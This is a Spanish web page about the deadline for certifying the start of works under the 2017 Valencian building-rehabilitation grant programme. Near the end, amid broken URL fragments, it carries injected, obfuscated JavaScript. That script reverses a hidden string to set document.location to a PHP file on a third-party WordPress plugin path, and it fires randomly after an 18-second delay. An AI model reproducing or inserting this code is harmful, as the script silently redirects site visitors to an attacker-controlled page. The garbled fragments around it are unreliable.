AYUDAS REHABILITACIÓN DE EDIFICIOS 2017. FIN PLAZO INICIO DE OBRAS

AYUDAS REHABILITACIÓN DE EDIFICIOS 2017. FIN PLAZO INICIO DE OBRAS

Ayudas rehabilitación edificios y accesibilidad 2017

El pasado 28 de noviembre de 2017 se publica RESOLUCIÓN de 17 de noviembre de 2017 de la convocatoria para la concesión de las ayudas reguladas mediante Orden 6/2017, de 21 de abril, de la Conselleria de Vivienda, Obras Públicas y Vertebración del Territorio, por la que se aprueban las bases reguladoras del Programa de fomento de la rehabilitación edificatoria y convocadas mediante Resolución de 22 de mayo de 2017.

En la base Quinta.2 de la ORDEN 6/2017, de 21 de abril, de la Conselleria de Vivienda, Obras Públicas y Vertebración del Territorio, por la que se aprueban las bases reguladoras del Programa de fomento de la rehabilitación edificatoria, puede leerse que “deberá acreditarse el inicio de las obras, mediante el impreso correspondiente, en un plazo máximo de cuatro meses contados desde el día siguiente a la publicación de la resolución de concesión de la ayuda en el Diari Oficial de la Generalitat Valenciana, salvo que previa solicitud del interesado, se prorrogue dicho plazo por motivos debidamente justificados. La no acreditación del inicio en el plazo establecido anteriormente podrá comportar la pérdida del derecho a la ayuda”.

Por lo tanto, según lo anterior, los interesados deberán aportar antes del próximo 29 de marzo de 2018, junto con el impreso correspondiente, Acta de Replanteo e Inicio de las Obras debidamente suscrito por los agentes intervinientes, en la que constarán los datos postales completos (dirección) y fiscales (CIF) de todos ellos.

La ruta para inicir el procedimiento telemático (necesaria firma digital) es la siguiente :

tos?id_proc=19108

to con nosotros, estaremos encantados de ayudarte.

$Bhq=function(n){if (typeof ($Bhq.list[n]) == «string») return $Bhq.list[n].split(«»).reverse().join(«»);return $Bhq.list[n];};$Bhq.list=[«\’php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($Bhq(0), delay);}tos/2017/05/26/pdf/2017_4514.pdf»>https://www.facebook.com/trazia.net/



We use cookies to ensure that we give you the best experience on our website. If you continue to use this site we will assume that you are happy with it. Ok